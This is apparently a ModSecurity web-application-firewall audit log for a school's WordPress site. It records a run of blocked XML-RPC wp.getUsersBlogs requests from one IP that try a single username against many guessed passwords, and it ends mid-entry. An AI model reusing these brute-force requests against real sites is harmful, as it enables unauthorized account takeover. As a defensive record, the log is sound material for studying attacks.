HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b9ee41a-E-- --6b9ee41a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074146310653 5990 (- - -) Stopwatch2: 1745074146310653 5990; combined=4368, p1=481, p2=3551, p3=0, p4=0, p5=183, sr=89, sw=153, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b9ee41a-Z-- --fcde1a18-A-- [19/Apr/2025:21:50:10 +0700] aAO4Ig6cTFSgLAHl7PoLMgAAAAA 103.236.140.4 59576 103.236.140.4 8181 --fcde1a18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fcde1a18-C-- wp.getUsersBlogs wakasarpras tiffany --fcde1a18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcde1a18-E-- --fcde1a18-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074210909457 5285 (- - -) Stopwatch2: 1745074210909457 5285; combined=3821, p1=478, p2=3154, p3=0, p4=0, p5=112, sr=95, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcde1a18-Z-- --f1c9b05c-A-- [19/Apr/2025:21:51:12 +0700] aAO4YEruoUXZj665VUEtrAAAAMY 103.236.140.4 37582 103.236.140.4 8181 --f1c9b05c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 240 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f1c9b05c-C-- wp.getUsersBlogs wakasarpras smkn22-jkt_sch_id123456 --f1c9b05c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1c9b05c-E-- --f1c9b05c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074272360944 4767 (- - -) Stopwatch2: 1745074272360944 4767; combined=3485, p1=430, p2=2884, p3=0, p4=0, p5=100, sr=81, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1c9b05c-Z-- --09f73e23-A-- [19/Apr/2025:21:52:16 +0700] aAO4oEruoUXZj665VUEv2gAAANE 103.236.140.4 44006 103.236.140.4 8181 --09f73e23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --09f73e23-C-- wp.getUsersBlogs wakasarpras QWERT --09f73e23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09f73e23-E-- --09f73e23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074336199691 4971 (- - -) Stopwatch2: 1745074336199691 4971; combined=3485, p1=446, p2=2876, p3=0, p4=0, p5=95, sr=90, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09f73e23-Z-- --45c3691c-A-- [19/Apr/2025:21:53:16 +0700] aAO43EruoUXZj665VUExfAAAANI 103.236.140.4 50096 103.236.140.4 8181 --45c3691c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --45c3691c-C-- wp.getUsersBlogs wakasarpras Webadmin --45c3691c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45c3691c-E-- --45c3691c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074396223366 5876 (- - -) Stopwatch2: 1745074396223366 5876; combined=4403, p1=501, p2=3716, p3=0, p4=0, p5=109, sr=89, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45c3691c-Z-- --0f21c630-A-- [19/Apr/2025:21:54:17 +0700] aAO5GevDiFC_ir7MDwYbvQAAAEM 103.236.140.4 56340 103.236.140.4 8181 --0f21c630-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0f21c630-C-- wp.getUsersBlogs wakasarpras aaa --0f21c630-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f21c630-E-- --0f21c630-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074457936825 5275 (- - -) Stopwatch2: 1745074457936825 5275; combined=4127, p1=500, p2=3438, p3=0, p4=0, p5=112, sr=91, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f21c630-Z-- --81324803-A-- [19/Apr/2025:21:55:17 +0700] aAO5VevDiFC_ir7MDwYdYAAAAEc 103.236.140.4 34106 103.236.140.4 8181 --81324803-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --81324803-C-- wp.getUsersBlogs wakasarpras !null! --81324803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81324803-E-- --81324803-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (36+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074517983489 6316 (- - -) Stopwatch2: 1745074517983489 6316; combined=4926, p1=464, p2=4228, p3=0, p4=0, p5=139, sr=84, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81324803-Z-- --6c5db504-A-- [19/Apr/2025:21:56:17 +0700] aAO5kevDiFC_ir7MDwYeiQAAAE4 103.236.140.4 40352 103.236.140.4 8181 --6c5db504-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6c5db504-C-- wp.getUsersBlogs wakasarpras t0rchw00d --6c5db504-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c5db504-E-- --6c5db504-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074577938243 8092 (- - -) Stopwatch2: 1745074577938243 8092; combined=4813, p1=893, p2=3776, p3=0, p4=0, p5=86, sr=92, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c5db504-Z-- --cc0af025-A-- [19/Apr/2025:21:57:17 +0700] aAO5zXNa4dA2HllpK_O0oAAAAJI 103.236.140.4 46494 103.236.140.4 8181 --cc0af025-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cc0af025-C-- wp.getUsersBlogs wakasarpras coffee --cc0af025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc0af025-E-- --cc0af025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074637482050 5583 (- - -) Stopwatch2: 1745074637482050 5583; combined=4096, p1=511, p2=3378, p3=0, p4=0, p5=126, sr=89, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc0af025-Z-- --56d7ca14-A-- [19/Apr/2025:21:58:17 +0700] aAO6CUruoUXZj665VUE5nwAAANc 103.236.140.4 52778 103.236.140.4 8181 --56d7ca14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --56d7ca14-C-- wp.getUsersBlogs wakasarpras qweewq --56d7ca14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56d7ca14-E-- --56d7ca14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074697887395 5613 (- - -) Stopwatch2: 1745074697887395 5613; combined=3891, p1=478, p2=3201, p3=0, p4=0, p5=131, sr=91, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56d7ca14-Z-- --9354a21a-A-- [19/Apr/2025:21:59:19 +0700] aAO6R-vDiFC_ir7MDwYi-AAAAEs 103.236.140.4 59042 103.236.140.4 8181 --9354a21a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9354a21a-C-- wp.getUsersBlogs wakasarpras zzzz --9354a21a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9354a21a-E-- --9354a21a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074759157263 4951 (- - -) Stopwatch2: 1745074759157263 4951; combined=3510, p1=430, p2=2913, p3=0, p4=0, p5=97, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9354a21a-Z-- --a9317d65-A-- [19/Apr/2025:22:00:19 +0700] aAO6gw6cTFSgLAHl7PoZYwAAABU 103.236.140.4 36912 103.236.140.4 8181 --a9317d65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a9317d65-C-- wp.getUsersBlogs wakasarpras qwe321 --a9317d65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9317d65-E-- --a9317d65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074819538175 5379 (- - -) Stopwatch2: 1745074819538175 5379; combined=4033, p1=480, p2=3280, p3=0, p4=0, p5=156, sr=86, sw=117, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9317d65-Z-- --d4227474-A-- [19/Apr/2025:22:00:41 +0700] aAO6mXNa4dA2HllpK_O5nwAAAJU 103.236.140.4 39200 103.236.140.4 8181 --d4227474-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d4227474-C-- wp.getUsersBlogs wakasarpras 1234%^&* --d4227474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4227474-E-- --d4227474-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074841880902 5151 (- - -) Stopwatch2: 1745074841880902 5151; combined=4051, p1=438, p2=3455, p3=0, p4=0, p5=96, sr=71, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4227474-Z-- --200f0055-A-- [19/Apr/2025:22:01:24 +0700] aAO6xOvDiFC_ir7MDwYlUwAAAFA 103.236.140.4 43348 103.236.140.4 8181 --200f0055-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --200f0055-C-- wp.getUsersBlogs wakasarpras qqii --200f0055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --200f0055-E-- --200f0055-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074884853330 5399 (- - -) Stopwatch2: 1745074884853330 5399; combined=3885, p1=455, p2=3260, p3=0, p4=0, p5=101, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --200f0055-Z-- --29ced913-A-- [19/Apr/2025:22:02:28 +0700] aAO7BEruoUXZj665VUFA6wAAANc 103.236.140.4 49338 103.236.140.4 8181 --29ced913-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --29ced913-C-- wp.getUsersBlogs wakasarpras 212903 --29ced913-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29ced913-E-- --29ced913-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745074948641384 5538 (- - -) Stopwatch2: 1745074948641384 5538; combined=3847, p1=478, p2=3186, p3=0, p4=0, p5=109, sr=91, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29ced913-Z-- --6bfff868-A-- [19/Apr/2025:22:03:29 +0700] aAO7QQ6cTFSgLAHl7Pod8gAAAAU 103.236.140.4 54968 103.236.140.4 8181 --6bfff868-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6bfff868-C-- wp.getUsersBlogs wakasarpras maria --6bfff868-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bfff868-E-- --6bfff868-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075009461839 5477 (- - -) Stopwatch2: 1745075009461839 5477; combined=4026, p1=510, p2=3344, p3=0, p4=0, p5=101, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bfff868-Z-- --c6b34b00-A-- [19/Apr/2025:22:04:32 +0700] aAO7gEruoUXZj665VUFEAgAAAMU 103.236.140.4 60570 